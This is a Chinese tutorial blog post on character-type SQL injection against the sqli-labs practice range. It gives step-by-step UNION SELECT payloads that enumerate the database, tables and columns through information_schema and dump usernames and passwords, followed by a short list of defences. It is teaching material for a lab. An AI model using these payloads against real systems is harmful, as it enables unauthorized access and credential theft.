简单的SQL字符型注入

目录

注入类型

判断字段数

确定回显点

查找数据库名

查找数据库表名 

查询字段名

获取想要的数据 


以sqli-labs靶场上的简单SQL注入为例

注入类型

判断是数字类型还是字符类型

常见的闭合方式

?id=1'、?id=1"、?id=1')、?id=1")等,大多都是单引号、双引号、括号的组合。

先尝试下字符型输入:?id=1'and 1=1#或者?id=1'and 1=1--+

(如果是字符型,可以用#或者--+或者%23注释掉单引号)

如果?id=1没有回显,那么输入?id=1 or 1=1(数字型)那么肯定会回显,输入?id=1' or 1=1--+(字符型)也肯定会回显(过滤字符可能不是--+,也可能是别的),但是用?id=1 and 1=1,或者?id=1' and 1=1--+不一定回显

99b4d6248638416f95196bb67e0dd04e.png

再试下:?id=1' and 1=2--+ 

541f7988e63143e385c3517388ef4e3d.png

没有回显 

证明是字符型输入,

回显是指页面有数据信息返回。无回显是指根据输入的语句,页面没有任何变化或者没有数据库中的内容显示到网页中。

如果是数字型输入,那么就可以正常输入:1

如何判断是字符型还是数字型呢,有一种方法:

数字型:

  • 1 and 1=1  //能回显
  • 1 and 1=2  //不能回显

字符型:

  • 1' and 1=1#  //能回显
  • 1' and 1=2#   //不能回显

判断字段数

判断字段数 order by

分四次输入:1' and 1=1 oder by 1--+   1' and 1=1 oder by 2--+  1' and 1=1 oder by 3--+    1' and 1=1 oder by 4--+

前两次都是正常回显,第三次报错,显示没有第三列,说明只有两个字段 61430bc38607457b99919a045eeb358c.png

 

确定回显点

输入:1' and 1=1 union select 1,2,3--+

a92613936d9846a4be8f648c23b1e987.png

发现1,2,3三个数没有一个回显,

因为第一个查询语句把后面的给挡住了,所以要把第一个查询语句失效

可以输入:1' and 1=2 union select 1,2,3--+  或者-1' union select 1,2,3--+

8af68d2db4ae452ea2409da9b5439198.png

2,3的位置成功回显 。2,3都可以是注入点 

 

就是可以更改这些点对应的相对的输入位置可以得到不同的输出;

查找数据库名

输入:-1' union select 1,2,database()--+

c074e8e5d02944a5b781f5f58df6c6bd.png

 得到对应的数据库名字:security

查找数据库表名 

849da3c5efd44846912a2cc425bae928.png

 输入:-1' union select 1,2,table_name from information_schema.tables where table_schema='security'--+

fc5a70c29ad24eb2ba38ac65b691832a.png

得到表名:emails,但是在这个数据库中可能不止一个表,所以我们要得到所有表,而不只是一个emails表

输入:-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

在mysql的关联查询或子查询中,函数 group_concat(arg) 可以合并多行的某列(或多列)数据为一行,默认以逗号分隔。

所以我们可以将tables表里面的所有tables_name表名合并成一行输出 

c55d5e0d9a7d4332a16fde4f268accb8.png

 显然我们想要的是users表

查询字段名

我们会用到上面图片中的column表

输入:-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

ea6eca5c7693439697826c4bd98faa22.png 7f982a26658f4723bc8ff2000e9e8a92.png

users表下的字段数很多,显然易见,我们想要获取的只是账号密码,所以,对我们有用的是username和password字段

获取想要的数据 

输入:-1' union select 1,2,group_concat(username,'-',password) from users --+

 ceceeb0f55d746e288b39f2ca349d448.png

成功得到对应的账号密码 

 

  • 21
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手工 SQL 注入漏洞通常是通过在应用程序的输入框中注入恶意 SQL 代码来实现的。当用户在应用程序的输入框中输入字符串时,如果应用程序没有对用户输入进行充分的验证和过滤,攻击者就可以在输入框中注入恶意的 SQL 代码,从而导致应用程序执行恶意的 SQL 查询。 在字符串类SQL 注入攻击中,攻击者通常会在输入框中输入一些特殊字符,例如单引号、双引号、反斜线等等,以试图破坏 SQL 查询语句的结构。攻击者还可能尝试使用 UNION、SELECT、FROM 等关键字来构造恶意查询语句,或者使用注释符号(例如"--")来注释掉原始查询语句中的一部分。最终,攻击者的目标是获取应用程序中存储的敏感数据,例如用户密码、信用卡信息等等。 要防止字符串类SQL 注入攻击,应用程序可以采取以下措施: 1. 对用户输入进行充分的验证和过滤,确保用户输入的数据符合预期的格式和结构。 2. 使用预编译语句或参数化查询,以保证 SQL 查询语句的结构不会被破坏。 3. 不要将用户输入作为 SQL 查询语句的一部分拼接到一起,而是使用参数化查询或存储过程来执行 SQL 查询。 4. 在应用程序中启用严格的访问控制和权限管理,以确保只有经过授权的用户才能访问敏感数据。 5. 定期对应用程序进行安全审计和漏洞扫描,及时发现和修复潜在的安全漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值